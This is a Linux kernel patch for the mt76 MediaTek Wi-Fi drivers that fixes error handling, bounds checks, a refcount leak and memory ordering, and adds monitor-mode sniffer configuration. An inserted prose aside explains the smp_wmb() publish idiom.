+@@ -495,7 +495,7 @@ static u32 __mt7915_reg_addr(struct mt7915_dev *dev, u32 addr)
+ 
+ 	if (dev_is_pci(dev->mt76.dev) &&
+ 	    ((addr >= MT_CBTOP1_PHY_START && addr <= MT_CBTOP1_PHY_END) ||
+-	     (addr >= MT_CBTOP2_PHY_START && addr <= MT_CBTOP2_PHY_END)))
++	    addr >= MT_CBTOP2_PHY_START))
+ 		return mt7915_reg_map_l1(dev, addr);
+ 
+ 	/* CONN_INFRA: covert to phyiscal addr and use layer 1 remap */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h b/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
+index 6351feba6bdf9..e58650bbbd14a 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
+@@ -70,6 +70,9 @@
+ 
+ #define MT7915_WED_RX_TOKEN_SIZE	12288
+ 
++#define MT7915_CRIT_TEMP_IDX		0
++#define MT7915_MAX_TEMP_IDX		1
++
+ struct mt7915_vif;
+ struct mt7915_sta;
+ struct mt7915_dfs_pulse;
+@@ -543,6 +546,7 @@ int mt7915_mcu_apply_tx_dpd(struct mt7915_phy *phy);
+ int mt7915_mcu_get_chan_mib_info(struct mt7915_phy *phy, bool chan_switch);
+ int mt7915_mcu_get_temperature(struct mt7915_phy *phy);
+ int mt7915_mcu_set_thermal_throttling(struct mt7915_phy *phy, u8 state);
++int mt7915_mcu_set_thermal_protect(struct mt7915_phy *phy);
+ int mt7915_mcu_get_rx_rate(struct mt7915_phy *phy, struct ieee80211_vif *vif,
+ 			   struct ieee80211_sta *sta, struct rate_info *rate);
+ int mt7915_mcu_rdd_background_enable(struct mt7915_phy *phy,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/regs.h b/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
+index aca1b2f1e9e3b..7e0d86366c778 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
+@@ -803,7 +803,6 @@ enum offs_rev {
+ #define MT_CBTOP1_PHY_START		0x70000000
+ #define MT_CBTOP1_PHY_END		__REG(CBTOP1_PHY_END)
+ #define MT_CBTOP2_PHY_START		0xf0000000
+-#define MT_CBTOP2_PHY_END		0xffffffff
+ #define MT_INFRA_MCU_START		0x7c000000
+ #define MT_INFRA_MCU_END		__REG(INFRA_MCU_ADDR_END)
+ #define MT_CONN_INFRA_OFFSET(p)		((p) - MT_INFRA_BASE)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+index c06c56a0270d6..686c9bbd59293 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+@@ -278,6 +278,7 @@ static int mt7986_wmac_coninfra_setup(struct mt7915_dev *dev)
+ 		return -EINVAL;
+ 
+ 	rmem = of_reserved_mem_lookup(np);
++	of_node_put(np);
+ 	if (!rmem)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c b/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
+index 47e034a9b0037..ed9241d4aa641 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
+@@ -33,14 +33,17 @@ mt7921_acpi_read(struct mt7921_dev *dev, u8 *method, u8 **tbl, u32 *len)
+ 	    sar_root->package.elements[0].type != ACPI_TYPE_INTEGER) {
+ 		dev_err(mdev->dev, "sar cnt = %d\n",
+ 			sar_root->package.count);
++		ret = -EINVAL;
+ 		goto free;
+ 	}
+ 
+ 	if (!*tbl) {
+ 		*tbl = devm_kzalloc(mdev->dev, sar_root->package.count,
+ 				    GFP_KERNEL);
+-		if (!*tbl)
++		if (!*tbl) {
++			ret = -ENOMEM;
+ 			goto free;
++		}
+ 	}
+ 	if (len)
+ 		*len = sar_root->package.count;
+@@ -52,9 +55,9 @@ mt7921_acpi_read(struct mt7921_dev *dev, u8 *method, u8 **tbl, u32 *len)
+ 			break;
+ 		*(*tbl + i) = (u8)sar_unit->integer.value;
+ 	}
+-free:
+ 	ret = (i == sar_root->package.count) ? 0 : -EINVAL;
+ 
++free:
+ 	kfree(sar_root);
+ 
+ 	return ret;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/init.c b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+index 542dfd4251290..d4b681d7e1d22 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+@@ -175,7 +175,7 @@ u8 mt7921_check_offload_capability(struct device *dev, const char *fw_wm)
+ 
+ 	if (!fw || !fw->data || fw->size < sizeof(*hdr)) {
+ 		dev_err(dev, "Invalid firmware\n");
+-		return -EINVAL;
++		goto out;
+ 	}
+ 
+ 	data = fw->data;
+@@ -206,6 +206,7 @@ u8 mt7921_check_offload_capability(struct device *dev, const char *fw_wm)
+ 		data += le16_to_cpu(rel_info->len) + rel_info->pad_len;
+ 	}
+ 
++out:
+ 	release_firmware(fw);
+ 
+ 	return features ? features->data : 0;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index 76ac5069638fe..cdb0d61903935 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -422,15 +422,15 @@ void mt7921_roc_timer(struct timer_list *timer)
+ 
+ static int mt7921_abort_roc(struct mt7921_phy *phy, struct mt7921_vif *vif)
+ {
+-	int err;
+-
+-	if (!test_and_clear_bit(MT76_STATE_ROC, &phy->mt76->state))
+-		return 0;
++	int err = 0;
+ 
+ 	del_timer_sync(&phy->roc_timer);
+ 	cancel_work_sync(&phy->roc_work);
+-	err = mt7921_mcu_abort_roc(phy, vif, phy->roc_token_id);
+-	clear_bit(MT76_STATE_ROC, &phy->mt76->state);
++
++	mt7921_mutex_acquire(phy->dev);
++	if (test_and_clear_bit(MT76_STATE_ROC, &phy->mt76->state))
++		err = mt7921_mcu_abort_roc(phy, vif, phy->roc_token_id);
++	mt7921_mutex_release(phy->dev);
+ 
+ 	return err;
+ }
+@@ -487,13 +487,8 @@ static int mt7921_cancel_remain_on_channel(struct ieee80211_hw *hw,
+ {
+ 	struct mt7921_vif *mvif = (struct mt7921_vif *)vif->drv_priv;
+ 	struct mt7921_phy *phy = mt7921_hw_phy(hw);
+-	int err;
+ 
+-	mt7921_mutex_acquire(phy->dev);
+-	err = mt7921_abort_roc(phy, mvif);
+-	mt7921_mutex_release(phy->dev);
+-
+-	return err;
++	return mt7921_abort_roc(phy, mvif);
+ }
+ 
+ static int mt7921_set_channel(struct mt7921_phy *phy)
+@@ -1711,7 +1706,10 @@ static void mt7921_ctx_iter(void *priv, u8 *mac,
+ 	if (ctx != mvif->ctx)
+ 		return;
+ 
+-	mt76_connac_mcu_uni_set_chctx(mvif->phy->mt76, &mvif->mt76, ctx);
++	if (vif->type & NL80211_IFTYPE_MONITOR)
++		mt7921_mcu_config_sniffer(mvif, ctx);
++	else
++		mt76_connac_mcu_uni_set_chctx(mvif->phy->mt76, &mvif->mt76, ctx);
+ }
+ 
+ static void
+@@ -1778,11 +1776,8 @@ static void mt7921_mgd_complete_tx(struct ieee80211_hw *hw,
+ 				   struct ieee80211_prep_tx_info *info)
+ {
+ 	struct mt7921_vif *mvif = (struct mt7921_vif *)vif->drv_priv;
+-	struct mt7921_dev *dev = mt7921_hw_dev(hw);
+ 
+-	mt7921_mutex_acquire(dev);
+ 	mt7921_abort_roc(mvif->phy, mvif);
+-	mt7921_mutex_release(dev);
+ }
+ 
+ const struct ieee80211_ops mt7921_ops = {
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+index fb9c0f66cb27c..7253ce90234ef 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+@@ -174,7 +174,7 @@ mt7921_mcu_uni_roc_event(struct mt7921_dev *dev, struct sk_buff *skb)
+ 	wake_up(&dev->phy.roc_wait);
+ 	duration = le32_to_cpu(grant->max_interval);
+ 	mod_timer(&dev->phy.roc_timer,
+-		  round_jiffies_up(jiffies + msecs_to_jiffies(duration)));
++		  jiffies + msecs_to_jiffies(duration));
+ }
+ 
+ static void
+@@ -1093,6 +1093,74 @@ int mt7921_mcu_set_sniffer(struct mt7921_dev *dev, struct ieee80211_vif *vif,
+ 				 true);
+ }
+ 
++int mt7921_mcu_config_sniffer(struct mt7921_vif *vif,
++			      struct ieee80211_chanctx_conf *ctx)
++{
++	struct cfg80211_chan_def *chandef = &ctx->def;
++	int freq1 = chandef->center_freq1, freq2 = chandef->center_freq2;
++	const u8 ch_band[] = {
++		[NL80211_BAND_2GHZ] = 1,
++		[NL80211_BAND_5GHZ] = 2,
++		[NL80211_BAND_6GHZ] = 3,
++	};
++	const u8 ch_width[] = {
++		[NL80211_CHAN_WIDTH_20_NOHT] = 0,
++		[NL80211_CHAN_WIDTH_20] = 0,
++		[NL80211_CHAN_WIDTH_40] = 0,
++		[NL80211_CHAN_WIDTH_80] = 1,
++		[NL80211_CHAN_WIDTH_160] = 2,
++		[NL80211_CHAN_WIDTH_80P80] = 3,
++		[NL80211_CHAN_WIDTH_5] = 4,
++		[NL80211_CHAN_WIDTH_10] = 5,
++		[NL80211_CHAN_WIDTH_320] = 6,
++	};
++	struct {
++		struct {
++			u8 band_idx;
++			u8 pad[3];
++		} __packed hdr;
++		struct config_tlv {
++			__le16 tag;
++			__le16 len;
++			u16 aid;
++			u8 ch_band;
++			u8 bw;
++			u8 control_ch;
++			u8 sco;
++			u8 center_ch;
++			u8 center_ch2;
++			u8 drop_err;
++			u8 pad[3];
++		} __packed tlv;
++	} __packed req = {
++		.hdr = {
++			.band_idx = vif->mt76.band_idx,
++		},
++		.tlv = {
++			.tag = cpu_to_le16(1),
++			.len = cpu_to_le16(sizeof(req.tlv)),
++			.control_ch = chandef->chan->hw_value,
++			.center_ch = ieee80211_frequency_to_channel(freq1),
++			.drop_err = 1,
++		},
++	};
++	if (chandef->chan->band < ARRAY_SIZE(ch_band))
++		req.tlv.ch_band = ch_band[chandef->chan->band];
++	if (chandef->width < ARRAY_SIZE(ch_width))
++		req.tlv.bw = ch_width[chandef->width];
++
++	if (freq2)
++		req.tlv.center_ch2 = ieee80211_frequency_to_channel(freq2);
++
++	if (req.tlv.control_ch < req.tlv.center_ch)
++		req.tlv.sco = 1; /* SCA */
++	else if (req.tlv.control_ch > req.tlv.center_ch)
++		req.tlv.sco = 3; /* SCB */
++
++	return mt76_mcu_send_msg(vif->phy->mt76->dev, MCU_UNI_CMD(SNIFFER),
++				 &req, sizeof(req), true);
++}
++
+ int
+ mt7921_mcu_uni_add_beacon_offload(struct mt7921_dev *dev,
+ 				  struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h b/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
+index 15d6b7fe1c6c8..d4cfa26c373c3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
+@@ -529,6 +529,8 @@ void mt7921_set_ipv6_ns_work(struct work_struct *work);
+ 
+ int mt7921_mcu_set_sniffer(struct mt7921_dev *dev, struct ieee80211_vif *vif,
+ 			   bool enable);
++int mt7921_mcu_config_sniffer(struct mt7921_vif *vif,
++			      struct ieee80211_chanctx_conf *ctx);
+ 
+ int mt7921_usb_sdio_tx_prepare_skb(struct mt76_dev *mdev, void *txwi_ptr,
+ 				   enum mt76_txq_id qid, struct mt76_wcid *wcid,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/debugfs.c b/drivers/net/wireless/mediatek/mt76/mt7996/debugfs.c
+index 2e4a8909b9e80..3d4fbbbcc2062 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/debugfs.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/debugfs.c
+@@ -457,7 +457,7 @@ mt7996_hw_queue_read(struct seq_file *s, u32 size,
+ 		if (val & BIT(map[i].index))
+ 			continue;
+ 
+-		ctrl = BIT(31) | (map[i].pid << 10) | (map[i].qid << 24);
++		ctrl = BIT(31) | (map[i].pid << 10) | ((u32)map[i].qid << 24);
+ 		mt76_wr(dev, MT_FL_Q0_CTRL, ctrl);
+ 
+ 		head = mt76_get_field(dev, MT_FL_Q2_CTRL,
+@@ -653,8 +653,9 @@ static int
+ mt7996_rf_regval_set(void *data, u64 val)
+ {
+ 	struct mt7996_dev *dev = data;
++	u32 val32 = val;
+ 
+-	return mt7996_mcu_rf_regval(dev, dev->mt76.debugfs_reg, (u32 *)&val, true);
++	return mt7996_mcu_rf_regval(dev, dev->mt76.debugfs_reg, &val32, true);
+ }
+ 
+ DEFINE_DEBUGFS_ATTRIBUTE(fops_rf_regval, mt7996_rf_regval_get,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.c
+index b9f62bedbc485..5d8e0353627e1 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.c
+@@ -65,17 +65,23 @@ static int mt7996_eeprom_load(struct mt7996_dev *dev)
+ 	} else {
+ 		u8 free_block_num;
+ 		u32 block_num, i;
++		u32 eeprom_blk_size = MT7996_EEPROM_BLOCK_SIZE;
+ 
+-		/* TODO: check free block event */
+-		mt7996_mcu_get_eeprom_free_block(dev, &free_block_num);
+-		/* efuse info not enough */
++		ret = mt7996_mcu_get_eeprom_free_block(dev, &free_block_num);
++		if (ret < 0)
++			return ret;
++
++		/* efuse info isn't enough */
+ 		if (free_block_num >= 59)
+ 			return -EINVAL;
+ 
+ 		/* read eeprom data from efuse */
+-		block_num = DIV_ROUND_UP(MT7996_EEPROM_SIZE, MT7996_EEPROM_BLOCK_SIZE);
+-		for (i = 0; i < block_num; i++)
+-			mt7996_mcu_get_eeprom(dev, i * MT7996_EEPROM_BLOCK_SIZE);
++		block_num = DIV_ROUND_UP(MT7996_EEPROM_SIZE, eeprom_blk_size);
++		for (i = 0; i < block_num; i++) {
++			ret = mt7996_mcu_get_eeprom(dev, i * eeprom_blk_size);
++			if (ret < 0)
++				return ret;
++		}
+ 	}
+ 
+ 	return mt7996_check_eeprom(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mac.c b/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
+index 0b3e28748e76b..0eb9e4d73f2c1 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
+@@ -469,7 +469,7 @@ static int mt7996_reverse_frag0_hdr_trans(struct sk_buff *skb, u16 hdr_gap)
+ 		ether_addr_copy(hdr.addr4, eth_hdr->h_source);
+ 		break;
+ 	default:
+-		break;
++		return -EINVAL;
+ 	}
+ 
+ 	skb_pull(skb, hdr_gap + sizeof(struct ethhdr) - 2);
+@@ -959,51 +959,6 @@ mt7996_mac_write_txwi_80211(struct mt7996_dev *dev, __le32 *txwi,
+ 	}
+ }
+ 
+-static u16
+-mt7996_mac_tx_rate_val(struct mt76_phy *mphy, struct ieee80211_vif *vif,
+-		       bool beacon, bool mcast)
+-{
+-	u8 mode = 0, band = mphy->chandef.chan->band;
+-	int rateidx = 0, mcast_rate;
+-
+-	if (beacon) {
+-		struct cfg80211_bitrate_mask *mask;
+-
+-		mask = &vif->bss_conf.beacon_tx_rate;
+-		if (hweight16(mask->control[band].he_mcs[0]) == 1) {
+-			rateidx = ffs(mask->control[band].he_mcs[0]) - 1;
+-			mode = MT_PHY_TYPE_HE_SU;
+-			goto out;
+-		} else if (hweight16(mask->control[band].vht_mcs[0]) == 1) {
+-			rateidx = ffs(mask->control[band].vht_mcs[0]) - 1;
+-			mode = MT_PHY_TYPE_VHT;
+-			goto out;
+-		} else if (hweight8(mask->control[band].ht_mcs[0]) == 1) {
+-			rateidx = ffs(mask->control[band].ht_mcs[0]) - 1;
+-			mode = MT_PHY_TYPE_HT;
+-			goto out;
+-		} else if (hweight32(mask->control[band].legacy) == 1) {
+-			rateidx = ffs(mask->control[band].legacy) - 1;
+-			goto legacy;
+-		}
+-	}
+-
+-	mcast_rate = vif->bss_conf.mcast_rate[band];
+-	if (mcast && mcast_rate > 0)
+-		rateidx = mcast_rate - 1;
+-	else
+-		rateidx = ffs(vif->bss_conf.basic_rates) - 1;
+-
+-legacy:
+-	rateidx = mt76_calculate_default_rate(mphy, rateidx);
+-	mode = rateidx >> 8;
+-	rateidx &= GENMASK(7, 0);
+-
+-out:
+-	return FIELD_PREP(MT_TX_RATE_IDX, rateidx) |
+-	       FIELD_PREP(MT_TX_RATE_MODE, mode);
+-}
+-
+ void mt7996_mac_write_txwi(struct mt7996_dev *dev, __le32 *txwi,
+ 			   struct sk_buff *skb, struct mt76_wcid *wcid, int pid,
+ 			   struct ieee80211_key_conf *key, u32 changed)
+@@ -1091,7 +1046,8 @@ void mt7996_mac_write_txwi(struct mt7996_dev *dev, __le32 *txwi,
+ 		/* Fixed rata is available just for 802.11 txd */
+ 		struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)skb->data;
+ 		bool multicast = is_multicast_ether_addr(hdr->addr1);
+-		u16 rate = mt7996_mac_tx_rate_val(mphy, vif, beacon, multicast);
++		u16 rate = mt76_connac2_mac_tx_rate_val(mphy, vif, beacon,
++							multicast);
+ 
+ 		/* fix to bw 20 */
+ 		val = MT_TXD6_FIXED_BW |
+@@ -1690,7 +1646,7 @@ void mt7996_mac_set_timing(struct mt7996_phy *phy)
+ 	else
+ 		val = MT7996_CFEND_RATE_11B;
+ 
+-	mt76_rmw_field(dev, MT_AGG_ACR0(band_idx), MT_AGG_ACR_CFEND_RATE, val);
++	mt76_rmw_field(dev, MT_RATE_HRCR0(band_idx), MT_RATE_HRCR0_CFEND_RATE, val);
+ 	mt76_clear(dev, MT_ARB_SCR(band_idx),
+ 		   MT_ARB_SCR_TX_DISABLE | MT_ARB_SCR_RX_DISABLE);
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/main.c b/drivers/net/wireless/mediatek/mt76/mt7996/main.c
+index 4421cd54311b1..c423b052e4f4c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/main.c
+@@ -880,7 +880,10 @@ mt7996_set_antenna(struct ieee80211_hw *hw, u32 tx_ant, u32 rx_ant)
+ 	phy->mt76->antenna_mask = tx_ant;
+ 
+ 	/* restore to the origin chainmask which might have auxiliary path */
+-	if (hweight8(tx_ant) == max_nss)
++	if (hweight8(tx_ant) == max_nss && band_idx < MT_BAND2)
++		phy->mt76->chainmask = ((dev->chainmask >> shift) &
++					(BIT(dev->chainshift[band_idx + 1] - shift) - 1)) << shift;
++	else if (hweight8(tx_ant) == max_nss)
+ 		phy->mt76->chainmask = (dev->chainmask >> shift) << shift;
+ 	else
+ 		phy->mt76->chainmask = tx_ant << shift;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
+index 04e1d10bbd21e..d593ed9e3f73c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
+@@ -335,6 +335,9 @@ mt7996_mcu_rx_radar_detected(struct mt7996_dev *dev, struct sk_buff *skb)
+ 
+ 	r = (struct mt7996_mcu_rdd_report *)skb->data;
+ 
++	if (r->band_idx >= ARRAY_SIZE(dev->mt76.phys))
++		return;
++
+ 	mphy = dev->mt76.phys[r->band_idx];
+ 	if (!mphy)
+ 		return;
+@@ -412,6 +415,9 @@ mt7996_mcu_ie_countdown(struct mt7996_dev *dev, struct sk_buff *skb)
+ 	struct header *hdr = (struct header *)data;
+ 	struct tlv *tlv = (struct tlv *)(data + 4);
+ 
++	if (hdr->band >= ARRAY_SIZE(dev->mt76.phys))
++		return;
++
+ 	if (hdr->band && dev->mt76.phys[hdr->band])
+ 		mphy = dev->mt76.phys[hdr->band];
+ 
+@@ -903,8 +909,8 @@ mt7996_mcu_sta_he_tlv(struct sk_buff *skb, struct ieee80211_sta *sta)
+ 	he = (struct sta_rec_he_v2 *)tlv;
+ 	for (i = 0; i < 11; i++) {
+ 		if (i < 6)
+-			he->he_mac_cap[i] = cpu_to_le16(elem->mac_cap_info[i]);
+-		he->he_phy_cap[i] = cpu_to_le16(elem->phy_cap_info[i]);
++			he->he_mac_cap[i] = elem->mac_cap_info[i];
++		he->he_phy_cap[i] = elem->phy_cap_info[i];
+ 	}
+ 
+ 	mcs_map = sta->deflink.he_cap.he_mcs_nss_supp;
+@@ -2393,7 +2399,7 @@ mt7996_mcu_restart(struct mt76_dev *dev)
+ 		.power_mode = 1,
+ 	};
+ 
+-	return mt76_mcu_send_msg(dev, MCU_WM_UNI_CMD(POWER_CREL), &req,
++	return mt76_mcu_send_msg(dev, MCU_WM_UNI_CMD(POWER_CTRL), &req,
+ 				 sizeof(req), false);
+ }
+ 
+@@ -2454,13 +2460,14 @@ void mt7996_mcu_exit(struct mt7996_dev *dev)
+ 	__mt76_mcu_restart(&dev->mt76);
+ 	if (mt7996_firmware_state(dev, false)) {
+ 		dev_err(dev->mt76.dev, "Failed to exit mcu\n");
+-		return;
++		goto out;
+ 	}
+ 
+ 	mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(0), MT_TOP_LPCR_HOST_FW_OWN);
+ 	if (dev->hif2)
+ 		mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(1),
+ 			MT_TOP_LPCR_HOST_FW_OWN);
++out:
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+ }
+ 
+@@ -2921,8 +2928,9 @@ int mt7996_mcu_get_eeprom(struct mt7996_dev *dev, u32 offset)
+ 	bool valid;
+ 	int ret;
+ 
+-	ret = mt76_mcu_send_and_get_msg(&dev->mt76, MCU_WM_UNI_CMD_QUERY(EFUSE_CTRL), &req,
+-					sizeof(req), true, &skb);
++	ret = mt76_mcu_send_and_get_msg(&dev->mt76,
++					MCU_WM_UNI_CMD_QUERY(EFUSE_CTRL),
++					&req, sizeof(req), true, &skb);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c b/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
+index 521769eb6b0e9..d8a2c1a744b25 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
+@@ -21,6 +21,7 @@ static const struct __base mt7996_reg_base[] = {
+ 	[WF_ETBF_BASE]		= { { 0x820ea000, 0x820fa000, 0x830ea000 } },
+ 	[WF_LPON_BASE]		= { { 0x820eb000, 0x820fb000, 0x830eb000 } },
+ 	[WF_MIB_BASE]		= { { 0x820ed000, 0x820fd000, 0x830ed000 } },
++	[WF_RATE_BASE]		= { { 0x820ee000, 0x820fe000, 0x830ee000 } },
+ };
+ 
+ static const struct __map mt7996_reg_map[] = {
+@@ -149,7 +150,7 @@ static u32 __mt7996_reg_addr(struct mt7996_dev *dev, u32 addr)
+ 
+ 	if (dev_is_pci(dev->mt76.dev) &&
+ 	    ((addr >= MT_CBTOP1_PHY_START && addr <= MT_CBTOP1_PHY_END) ||
+-	     (addr >= MT_CBTOP2_PHY_START && addr <= MT_CBTOP2_PHY_END)))
++	    addr >= MT_CBTOP2_PHY_START))
+ 		return mt7996_reg_map_l1(dev, addr);
+ 
+ 	/* CONN_INFRA: covert to phyiscal addr and use layer 1 remap */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/regs.h b/drivers/net/wireless/mediatek/mt76/mt7996/regs.h
+index 794f61b93a466..7a28cae34e34b 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/regs.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/regs.h
+@@ -33,6 +33,7 @@ enum base_rev {
+ 	WF_ETBF_BASE,
+ 	WF_LPON_BASE,
+ 	WF_MIB_BASE,
++	WF_RATE_BASE,
+ 	__MT_REG_BASE_MAX,
+ };
+ 
+@@ -235,13 +236,6 @@ enum base_rev {
+ 						 FIELD_PREP(MT_WTBL_LMAC_ID, _id) | \
+ 						 FIELD_PREP(MT_WTBL_LMAC_DW, _dw))
+ 
+-/* AGG: band 0(0x820e2000), band 1(0x820f2000), band 2(0x830e2000) */
+-#define MT_WF_AGG_BASE(_band)			__BASE(WF_AGG_BASE, (_band))
+-#define MT_WF_AGG(_band, ofs)			(MT_WF_AGG_BASE(_band) + (ofs))
+-
+-#define MT_AGG_ACR0(_band)			MT_WF_AGG(_band, 0x054)
+-#define MT_AGG_ACR_CFEND_RATE			GENMASK(13, 0)
+-
+ /* ARB: band 0(0x820e3000), band 1(0x820f3000), band 2(0x830e3000) */
+ #define MT_WF_ARB_BASE(_band)			__BASE(WF_ARB_BASE, (_band))
+ #define MT_WF_ARB(_band, ofs)			(MT_WF_ARB_BASE(_band) + (ofs))
+@@ -300,6 +294,13 @@ enum base_rev {
+ #define MT_WF_RMAC_RSVD0(_band)			MT_WF_RMAC(_band, 0x03e0)
+ #define MT_WF_RMAC_RSVD0_EIFS_CLR		BIT(21)
+ 
++/* RATE: band 0(0x820ee000), band 1(0x820fe000), band 2(0x830ee000) */
++#define MT_WF_RATE_BASE(_band)			__BASE(WF_RATE_BASE, (_band))
++#define MT_WF_RATE(_band, ofs)			(MT_WF_RATE_BASE(_band) + (ofs))
++
++#define MT_RATE_HRCR0(_band)			MT_WF_RATE(_band, 0x050)
++#define MT_RATE_HRCR0_CFEND_RATE		GENMASK(14, 0)
++
+ /* WFDMA0 */
+ #define MT_WFDMA0_BASE				0xd4000
+ #define MT_WFDMA0(ofs)				(MT_WFDMA0_BASE + (ofs))
+@@ -463,7 +464,6 @@ enum base_rev {
+ #define MT_CBTOP1_PHY_START			0x70000000
+ #define MT_CBTOP1_PHY_END			0x77ffffff
+ #define MT_CBTOP2_PHY_START			0xf0000000
+-#define MT_CBTOP2_PHY_END			0xffffffff
+ #define MT_INFRA_MCU_START			0x7c000000
+ #define MT_INFRA_MCU_END			0x7c3fffff
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio.c b/drivers/net/wireless/mediatek/mt76/sdio.c
+index 228bc7d45011c..419723118ded8 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio.c
+@@ -562,6 +562,10 @@ mt76s_tx_queue_skb_raw(struct mt76_dev *dev, struct mt76_queue *q,
+ 
+ 	q->entry[q->head].buf_sz = len;
+ 	q->entry[q->head].skb = skb;
++
++	/* ensure the entry fully updated before bus access */
++	smp_wmb();
++
+ 	q->head = (q->head + 1) % q->ndesc;
+ 	q->queued++;
+ 
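
[Note on the idiom] The smp_wmb() added above orders the writes that fill the queue entry before the write that publishes the new head index, so a consumer that observes the updated index is guaranteed to also observe a complete entry; the consumer side needs a matching read barrier (or acquire semantics) for the pairing to have any effect. A kernel-style sketch of the publish side, with a hypothetical ring type:

    /* Kernel-style sketch; 'struct ring' is a hypothetical stand-in. */
    #include <asm/barrier.h>    /* smp_wmb() */

    struct entry { void *buf; int len; };
    struct ring  { struct entry e[64]; unsigned int head; };

    static void ring_push(struct ring *r, void *buf, int len)
    {
        r->e[r->head].buf = buf;
        r->e[r->head].len = len;

        /* Make the entry visible before the index that announces it. */
        smp_wmb();

        r->head = (r->head + 1) % 64;
    }
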
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio_txrx.c b/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
+index bfc4de50a4d23..ddd8c0cc744df 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
+@@ -254,6 +254,10 @@ static int mt76s_tx_run_queue(struct mt76_dev *dev, struct mt76_queue *q)
+ 
+ 		if (!test_bit(MT76_STATE_MCU_RUNNING, &dev->phy.state)) {
+ 			__skb_put_zero(e->skb, 4);
++			err = __skb_grow(e->skb, roundup(e->skb->len,
++							 sdio->func->cur_blksize));
++			if (err)
++				return err;
+ 			err = __mt76s_xmit_queue(dev, e->skb->data,
+ 						 e->skb->len);
+ 			if (err)
+diff --git a/drivers/net/wireless/mediatek/mt7601u/dma.c b/drivers/net/wireless/mediatek/mt7601u/dma.c
+index 457147394edc4..773a1cc2f8520 100644
+--- a/drivers/net/wireless/mediatek/mt7601u/dma.c
++++ b/drivers/net/wireless/mediatek/mt7601u/dma.c
+@@ -123,7 +123,8 @@ static u16 mt7601u_rx_next_seg_len(u8 *data, u32 data_len)
+ 	if (data_len < min_seg_len ||
+ 	    WARN_ON_ONCE(!dma_len) ||
+ 	    WARN_ON_ONCE(dma_len + MT_DMA_HDRS > data_len) ||
+-	    WARN_ON_ONCE(dma_len & 0x3))
++	    WARN_ON_ONCE(dma_len & 0x3) ||
++	    WARN_ON_ONCE(dma_len < min_seg_len))
+ 		return 0;
+ 
+ 	return MT_DMA_HDRS + dma_len;
